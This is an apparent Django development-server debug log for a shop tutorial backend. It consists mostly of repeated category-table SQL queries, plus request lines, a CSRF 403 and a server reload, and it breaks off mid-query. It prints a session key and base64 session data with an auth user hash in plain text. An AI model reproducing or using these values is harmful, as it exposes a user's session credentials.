DEBUG 2019-12-27 09:20:32,930 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:20:32,934 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:20:32,936 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:20:32,939 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:20:32,941 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:20:32,943 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:20:32,946 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:20:32,949 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:20:32,951 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:20:32,953 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:20:32,956 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:20:32,958 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:20:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:21:02,635 utils 32506 139738707130112 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:21:02,646 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:21:02,652 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:21:02,656 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:21:02,661 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:21:02,665 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:21:02,670 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:21:02,674 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:21:02,677 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:21:02,683 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:21:02,687 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:21:02,691 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:21:02,695 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:21:02,699 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:21:02,704 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:21:02,708 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:21:02,712 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:21:02,716 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:21:02,720 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:21:02,726 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:21:02,730 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:21:02,734 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:21:02,738 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:21:02,742 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:21:02,746 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:21:02,752 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:21:02,756 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:21:02,760 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:21:02,763 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:21:02,767 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:21:02,773 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:21:02,777 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:21:02,781 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:21:02,785 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:21:02,789 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:21:02,795 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:21:02,799 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:21:02,803 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:21:02,807 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:21:02,810 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:21:02,814 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:21:02,819 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:21:02,823 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:21:02,827 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:21:02,832 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:21:02,835 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-27 09:21:02,890 utils 32506 139738707130112 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-27T09:21:02.884835+00:00'::timestamptz AND "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'); args=(datetime.datetime(2019, 12, 27, 9, 21, 2, 884835, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') DEBUG 2019-12-27 09:21:03,021 utils 32506 139738707130112 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-10T09:21:03.018029+00:00'::timestamptz WHERE "django_session"."session_key" = '8hyn47cjuae89j7mbn5kpmybirz8ihda'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 10, 9, 21, 3, 18029, tzinfo=), '8hyn47cjuae89j7mbn5kpmybirz8ihda') [27/Dec/2019 09:21:03] "GET /api/v1/categories/ HTTP/1.0" 200 51103 Not Found: /robots.txt [27/Dec/2019 09:21:03] "GET /robots.txt HTTP/1.0" 404 6343 [27/Dec/2019 09:21:03] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [27/Dec/2019 09:21:03] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [27/Dec/2019 09:21:03] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [27/Dec/2019 09:21:03] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [27/Dec/2019 09:21:03] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [27/Dec/2019 09:21:03] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [27/Dec/2019 09:21:03] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [27/Dec/2019 09:21:03] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [27/Dec/2019 09:21:03] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [27/Dec/2019 09:21:04] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [27/Dec/2019 09:21:05] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 Not Found: /favicon.ico [27/Dec/2019 09:21:06] "GET /favicon.ico HTTP/1.0" 404 6346 Forbidden (CSRF cookie not set.): /api-token-auth/ [27/Dec/2019 09:22:21] "POST /api-token-auth/ HTTP/1.0" 403 2868 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/middleware.py changed, reloading. Performing system checks... December 27, 2019 - 07:46:33 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-27 09:23:28,346 utils 2749 140297364883200 (0.008) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = 